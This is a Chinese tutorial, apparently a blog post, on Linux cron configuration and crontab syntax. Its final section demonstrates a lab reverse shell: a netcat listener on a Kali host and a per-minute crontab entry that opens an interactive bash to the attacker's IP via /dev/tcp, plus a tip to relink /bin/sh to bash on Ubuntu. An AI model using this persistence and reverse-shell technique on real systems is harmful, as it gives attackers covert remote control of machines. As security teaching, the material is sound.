在Linux 系统上面原本就有非常多的计划性工作,因此这个系统服务是默认启动的。但是,Linux系统也给用户提供了可以自己设置计划,这就是定时任务。通过定时任务,用户可以自己设置在什么时候执行什么命令,在这个过程中涉及到 crontab 命令。
在Linux中,周期执行的任务一般由cron这个守护进程来处理,cron读取一个或多个配置文件,这些配置文件中包含了命令行及其调用时间,cron的配置文件称为“crontab”,是“cron table”的简写。
一般cron在3个地方查找配置文件:
/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名。
/etc/crontab 这个文件负责安排由系统管理员制定的维护系统以及其他任务的crontab。
/etc/cron.d/ 这个目录用来存放任何要执行的crontab文件或脚本。
cron服务一般是自启的:
service crond start 启动服务
service crond stop 关闭服务
service crond restart 重启服务
service crond reload 重新载入配置
service crond status 查看服务状态
cron有两个配置文件,一个是一个全局配置文件(/etc/crontab),是针对系统任务的;一组是crontab命令生成的配置文件(/var/spool/cron下的文件),是针对某个用户的。定时任务配置到任意一个中都可以。
查看全局配置文件配置情况:
cat /etc/crontab# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
查看当前用户下的定时任务:
crontab -l 或 cat /var/spool/cron/用户名
root就是我当前用户的定时任务。
crontab任务配置基本格式:
* * * * * (command)
第一个 * 表示分钟1~59,每分钟用 * 或者 */1 表示
第二个 * 表示小时1~23(0表示0点)
第三个 * 表示日期1~31
第四个 * 表示月份1~12
第五个 * 表示星期0~6(0表示星期天)
(command) 表示要运行的命令
在以上任何值中,星号(*)可以用来代表所有有效的值。比如,月份值中的星号意味着在满足其它制约条件后每月都执行该命令。
整数间的短线(-)指定一个整数范围。比如,1-4 意味着整数 1、2、3、4。
用逗号(,)隔开的一系列值指定一个列表。比如,3, 4, 6, 8 标明这四个指定的整数。
正斜线(/)可以用来指定间隔频率。在范围后加上 / 意味着在范围内可以跳过 integer。譬如,0-59/2 可以用来在分钟字段定义每两分钟。间隔频率值还可以和星号一起使用。例如,*/3 的值可以用在月份字段中表示每三个月运行一次任务。
开头为井号(#)的行是注释,不会被处理。
例如:
0 4 * * * rm ~/桌面/test.txt
//每天晚上四点删除 ~/桌面/ 这个目录下的 test.txt 这个文件10 4 1,3,5 * * service apache2 restart
//表示每月1,3,5号的4:10会重启Apache服务器......
参数说明:
usage: crontab [-u user] file
crontab [ -u user ] [ -i ] { -e | -l | -r }
(default operation is replace, per 1003.2)
-e (edit user's crontab)
-l (list user's crontab)
-r (delete user's crontab)
-i (prompt before deleting user's crontab)例如:当前用户是root,创建root的定时任务
crontab -e //进入编辑模式写下定时任务
然后查看当前用户的定时任务: crontab -l
我写的定时任务是在每天12:05时在/var/spool/cron/ 目录下创建一个test.txt文件,可以看到任务已经执行。
定时任务反弹shell:
通常在在网络安全中,我们用crontab创建定时任务反弹shell
在本地演示一下
攻击机:kali ip:192.168.1.184
目标机:ubuntu ip:192.168.1.170
演示开始:
先在攻击机上监听端口
root@kali:~# nc -lvp 8888
listening 正在监听
接下来在目标机上写下定时任务
crontab -e //打开编辑器,写入
* * * * * bash -i >& /dev/tcp/192.168.1.184/8888 0>&1成功反弹shell
不过在ubuntu下写定时任务反弹shell有个问题:
通常linux里面的cron中command执行的shell环境是/bin/sh
而在ubuntu中的/bin/sh 文件实际上是一个软链接文件,他指向的是dash这个shell ,而实际上dash这个shell只有运行脚本的能力,而没有交互能力。 这里我们只需要将sh的软链接修改为bash即可
sudo ln - s -f bash /bin/sh //修改软连接需要root权限修改成功后就会出现上面反弹shell成功。
Ubuntu下计划任务反弹shell需要注意的事项:
1.需要用root权限书写计划
2.书写crontab计划的时候要将/bin/sh 软链接到 /bin/bash
500
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
